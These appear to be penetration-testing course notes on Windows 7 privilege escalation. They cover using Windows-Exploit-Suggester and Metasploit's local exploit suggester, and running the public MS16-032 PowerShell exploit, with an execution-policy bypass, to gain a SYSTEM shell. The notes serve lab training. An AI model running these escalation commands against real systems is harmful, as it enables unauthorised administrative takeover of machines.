Skip to content

Windows Desktop

  • Windows 7 was made end-of-life on January 14, 2020, but is still in use in many environments.

Windows 7 Case Study

  • Using - https://github.com/AonCyberLabs/Windows-Exploit-Suggester
  • If installation issues

Install Python Dependencies (local VM only)

  • This tool works on the Pwnbox, but to get it working on a local version of Parrot, we need to do the following to install the necessary dependencies. 

    $ sudo wget https://files.pythonhosted.org/packages/28/84/27df240f3f8f52511965979aad7c7b77606f8fe41d4c90f2449e02172bb1/setuptools-2.0.tar.gz
$ sudo tar -xf setuptools-2.0.tar.gz 
$ cd setuptools-2.0/ 
$ sudo python2.7 setup.py install  

$ sudo wget https://files.pythonhosted.org/packages/42/85/25caf967c2d496067489e0bb32df069a8361e1fd96a7e9f35408e56b3aab/xlrd-1.0.0.tar.gz 
$ sudo tar -xf xlrd-1.0.0.tar.gz $ cd xlrd-1.0.0/ 
$ sudo python2.7 setup.py install`

  • Gathering Systeminfo Command Output

    • systeminfo
  • Updating the Local Microsoft Vulnerability Database
    • sudo python2.7 windows-exploit-suggester.py --update
  • Running the Windows Exploit Suggester
    • python2.7 windows-exploit-suggester.py --database 2021-05-13-mssb.xls --systeminfo win7lpe-systeminfo.txt
  • If we have a meterpreter shell as in previous exercise, we can use this local exploit suggester - https://www.rapid7.com/blog/post/2015/08/11/metasploit-local-exploit-suggester-do-less-get-more/
  • MS16-032 - https://googleprojectzero.blogspot.com/2016/03/exploiting-leaked-thread-handle.html
  • Exploiting MS16-032 with PowerShell PoC
    • use PoC - https://www.exploit-db.com/exploits/39719
    • Set-ExecutionPolicy bypass -scope process
    • Import-Module .\Invoke-MS16-032.ps1
    • Invoke-MS16-032
    • This works and we spawn a SYSTEM cmd console.